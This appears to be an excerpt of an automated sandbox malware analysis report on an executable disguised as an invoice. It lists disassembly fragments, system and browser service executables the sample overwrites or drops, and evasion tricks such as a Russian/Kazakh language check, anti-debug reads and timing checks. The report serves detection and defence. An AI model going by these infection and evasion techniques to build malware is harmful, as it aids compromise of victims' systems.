          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA7FBFh; ret 0_2_00BA831F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA7FA8h; ret 0_2_00BA834C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA84BAh; ret 0_2_00BA83E2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8426h; ret 0_2_00BA84D8
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8075h; ret 0_2_00BA84FD
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA808Ch; ret 0_2_00BA8512
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8B6Fh; ret 0_2_00BA8596
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8E94h; ret 0_2_00BA85C9
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA878Bh; ret 0_2_00BA8734
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8D45h; ret 0_2_00BA87D3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8E5Fh; ret 0_2_00BA885F
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8AB5h; ret 0_2_00BA8B13
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8784h; ret 0_2_00BA8CA1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BA8550 push 00BA8DC9h; ret 0_2_00BA8E1C
          Source: INV_NE_02_2034388.exeStatic PE information: section name: .reloc entropy: 7.938066838476511
          Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.952862113167232
          Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.943002306706308
          Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.949279926947667
          Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.950770360029562

          Persistence and Installation Behavior

          barindex
          Creates files in the system32 config directory
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\7c03ee2ee2c8fb2a.binJump to behavior
          Drops executable to a common third party application directory
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BACBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00BACBD0
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to behave differently if execute on a Russian/Kazak computer
          Source: C:\Windows\System32\AppVClient.exeCode function: 12_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 12_2_005352A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 16_2_009952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 16_2_009952A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 18_2_015A52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 18_2_015A52A0
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI/Special instruction interceptor: Address: E9EEA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E rdtsc 17_2_03C7096E
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeDropped PE file which has not been started: C:\Windows\System32\msdtc.exeJump to dropped file
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-111057
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI coverage: 4.9 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe TID: 7788Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe TID: 7788Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 8116Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1278849229.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285701934.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz/U
          Source: INV_NE_02_2034388.exe, 00000000.00000003.1307392420.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287789213.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
          Source: AppVClient.exe, 0000000C.00000003.1282030119.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1282293874.00000000005D7000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000003.1282377257.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000C.00000002.1292625401.00000000005F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine#
          Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI call chain: ExitProcess graph end nodegraph_0-108899
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeAPI call chain: ExitProcess graph end nodegraph_0-109245
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E rdtsc 17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00417D33 LdrLoadDll,17_2_00417D33
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00573594 mov eax, dword ptr fs:[00000030h]0_2_00573594
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00B81130 mov eax, dword ptr fs:[00000030h]0_2_00B81130
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC3F3D mov eax, dword ptr fs:[00000030h]0_2_00BC3F3D
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9F170 mov eax, dword ptr fs:[00000030h]0_2_00E9F170
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9F110 mov eax, dword ptr fs:[00000030h]0_2_00E9F110
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00E9DAB0 mov eax, dword ptr fs:[00000030h]0_2_00E9DAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CEC3CD mov eax, dword ptr fs:[00000030h]17_2_03CEC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]17_2_03C3A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C383C0 mov eax, dword ptr fs:[00000030h]17_2_03C383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB63C0 mov eax, dword ptr fs:[00000030h]17_2_03CB63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CDE3DB mov eax, dword ptr fs:[00000030h]17_2_03CDE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD43D4 mov eax, dword ptr fs:[00000030h]17_2_03CD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD43D4 mov eax, dword ptr fs:[00000030h]17_2_03CD43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C403E9 mov eax, dword ptr fs:[00000030h]17_2_03C403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]17_2_03C4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C663FF mov eax, dword ptr fs:[00000030h]17_2_03C663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2E388 mov eax, dword ptr fs:[00000030h]17_2_03C2E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5438F mov eax, dword ptr fs:[00000030h]17_2_03C5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5438F mov eax, dword ptr fs:[00000030h]17_2_03C5438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28397 mov eax, dword ptr fs:[00000030h]17_2_03C28397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB2349 mov eax, dword ptr fs:[00000030h]17_2_03CB2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov ecx, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB035C mov eax, dword ptr fs:[00000030h]17_2_03CB035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA352 mov eax, dword ptr fs:[00000030h]17_2_03CFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD8350 mov ecx, dword ptr fs:[00000030h]17_2_03CD8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D0634F mov eax, dword ptr fs:[00000030h]17_2_03D0634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD437C mov eax, dword ptr fs:[00000030h]17_2_03CD437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6A30B mov eax, dword ptr fs:[00000030h]17_2_03C6A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C2C310 mov ecx, dword ptr fs:[00000030h]17_2_03C2C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C50310 mov ecx, dword ptr fs:[00000030h]17_2_03C50310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov ecx, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D08324 mov eax, dword ptr fs:[00000030h]17_2_03D08324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]17_2_03C3A2C3
